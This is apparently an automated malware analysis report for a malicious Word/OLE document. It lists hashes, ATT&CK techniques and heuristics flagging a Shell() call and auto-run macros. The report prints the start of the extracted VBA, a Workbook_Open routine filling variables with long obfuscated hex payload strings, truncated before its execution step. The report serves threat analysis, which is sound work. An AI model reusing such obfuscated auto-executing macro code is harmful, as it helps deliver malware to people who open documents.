Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 209702b2a3f15b57…

MALICIOUS

Office (OLE)

241.5 KB Created: 2018-03-18 10:59:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 39d6761ddaf380429983482affd0e8cf SHA-1: 25391ef801f11ad17e39ca72881359415188d200 SHA-256: 209702b2a3f15b57b69e94f0647e3e95123675e0d2460aed2e234d9633520d2d
264 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including a Workbook_Open auto-execution macro, which utilizes the Shell() function. This indicates the document is designed to download and execute a secondary payload. The presence of a 'macros.bas' file and the ClamAV detection further support its malicious nature.

Heuristics 8

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20375 bytes
SHA-256: d8c7063f886da50c772838492ed68656ea69f3ffa6c442926bebd438cc89d543
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 78 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
Dim XOZ_SRB As String
XOZ_SRB = "365D5D5D635D795D6F5D4C495D76452B5D306B29685D5D51862F5D5D985D7D845D76795D2C5D375D8C5D5D5D4D5D255D5D7B735D6D5F6B5D7F5D8E5D5D5D3F5D5D5D5DC65D3552835D4B1F5D225D2741283A705D345D29855D3B5D5D8D5D8B4C885D255D5D985C8A5D823D5D7B"
Dim XIB_GDY As String
XIB_GDY = "34845D5D5D2F5D745D825D535D5D8D8A855D5D2320832B5D316E4A435D932B6D2560889A295D3A5D8830775E62635D995D5D7D5D5D2F81445D365D5D5D4F275D5D5D66225D795D5D5D295D7B5D8D5D4B5034395D5D5D625D5D5D79585727885D7C715D94267B885F5D94913835"
Dim M_QRP As String
M_QRP = "5D5D6F5D215D5D775D875D76852F725D7F5D5B5D995D58435D5D9D89479D565D288853505D5D23744E5D5D5D765D60325D975D8F995D5D1E4A5D5D9B5D5D5D4C3A67564A5D2C5E5D425D5D945D715D83885D5D9B5D5D5D744F8461715D503D5D5D5A5D285D5D895D5D6A5D2F86"
Dim I_SY As String
I_SY = "3E5D5D6A303D5D515D5D5D815D5D5D5D6991825D383566785D24612A5D555D5D5D2F5D94255D31565D325D5D3073F93A1E7F5D5D245D5D5D375D445D7E5D5D5D8F375D5D5D7E4A5D23917C5D8D5D5D8E5D54763444295D5D33545D5D993B625D254A5D329B9A1E5D5D1E6A445B"
Dim UUO_GT As String
UUO_GT = "3E86415D76475D5D5D83695D5D6C845D5D5D4D915D615D5D7A3F5D765D7A285D5D5D345D8F5D5D38619C8A9C7D9C5D4B5D5D66373A5D5D5D6B78558C6C5D81795D5D555D435D40324D4B5D6B945D4A5D5D5D315D823663565D42895D5D5D5D27415D5D615D5DEA5D265D82246C"
Dim NAV_JJX As String
NAV_JJX = "5D9A285D646E88825D895D5D1F6E5D86585D5D485D475D5D5D5D7A5D5D505D6A5D5D82625D5D4F205D5D5D5D5A815D655D57425D703F695D7C5D8E25395D5D575D7F2E5D5D7B328F5D452F5D3144675D5D6C3D5D5D745D809D5D5D5D66485D6B475D2B5D701F8F81425D66482D"
Dim IQ_XPR As String
IQ_XPR = "5D5D569D5D675D875D7C673C289643465D5F5D9485368C625D5D5D5D2C8F715D655D8D8D5D375D735D355D5D855D5D5D5D5D68523A3D2F5D5D5D5D5D6E7079685D5D5D5D455D3F9187745D5D945D5D62685D265D495D7B5D71485373297D5D675D5D3F675D3D5D88315D5D5D5D"
Dim LSZ_EH As String
LSZ_EH = "5D965D485D245D705D5D5A755D6E5D5D5D85285D74615D5D9148915D5D5D5D754985775D5D5D2B5D5D5D5D5D665F5D465D8D5D4D5D4E5D235D3C33835D5D5D68715D1E5D5D7E745D5D5D795D5D625E4898634E28465D559B5D5F5D5D9D5B5D3C988A5D5F5D5D5C375D83235D5D"
Dim FOG_VHB As String
FOG_VHB = "245D5D5D58585D9D5E48325D515D3D5D5D687A5D5A5D8F5D5D4D5D243546E45D5D5D885D4063215E5D585F5D965D5D3D5D33385D41625D825C5D286D5D8635845D5D555D5D5D5D2377695D674D265D861E5D315D5D835D8A235D6B585D5D54415D24565D51875D88336E5D5552"
Dim XU_NQX As String
XU_NQX = "546C5D6C5D5D225D5D5D9C685D5D7A5D5D8444721F6C5D5D9B5D5D5D5D5D2E525D9D5D5D835D723D3A747C2F5D3B2B685D3B5F2F5D521E5D68777948416A8B345D7D7B505D5D2F25565D5D5D5D5D895D675D8E5D405D685D5D5D9B5D5D5D50305D5D5D5D3689484D285D5D2E21"
Dim P_GU As String
P_GU = "5D5D5D5D5D5F5D5D5D337C817A93356163965D402F5D5D4F94645D36675D5D5D635D2A212F5D54235D5D6F5D2D5D365D802E515D5F5D5D5D5D728E5D349D295D525D5D3B4F5D225D9A845D5D6E5D5D735D4C7F435D242268725D3A5D522B5D4C5D5D5D785D5A59518221955D5D"
Dim SSO_JEX As String
SSO_JEX = "5D5D5D7B485D2F5D8022344B5D5D5D7E8B7A985D464B447C5D5D5D4B5D5D5D975D5D498B5D285D9479445D5D4B5D5D5D5D5D5D5D5D21985D5D5D9B5D3C5D5D855D5D3E5D5D5D5D705D707B205D974E5D208E775D5D5D5D5D545D5D39755D5D3F42975D5D5D42726E8C5D965D2C"
Dim WL_PLR As String
WL_PLR = "5D5D5D695D8E5D5D5D5D5D2A538D5D5D9A5D725D5D9398965D5D5E685D5D5D5D5D8B5D885D5D4B9C5F5D2B5D5D905D5D7B5D345D57525D4C5D5D5D284352851E42705B5D5D45575D5D8A5D5D305D5D5D5D833B5D5D51925D5D5D955D5D5D5D5D3D5D4D5D5D5D6D5D5D4E945D53"
Dim HQP_QP As String
HQP_QP = "5D5D655D355D445D5D685D892A5D5D204F5D5D455D5D5D5D5D8529425F5D5D90465D5D855D5F385D5D90605D604B62566D3D5D5D5D5D624F5C5D5D8C92645D7A97793A58942B5D635D85663887575D5D5D5D415D625D5D5D842D5D5D925D5D2A5D5D3A335D5D265D5D8C71485D"
Dim S_Y As String
S_Y = "23975D9A5D405D359C796D5D8550259B5188692C5D5D5D5D5D4B5D5D5D335D975A655D4A5D5D7D5D625D535D5D5F5F801E3F5D22253A625D5D315D8E5D318F865D5D3D7A5D59288F5D6C6C205D5D495D5D815D8F3E21725D5D765D624E7A5D5D5D5D4023435
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.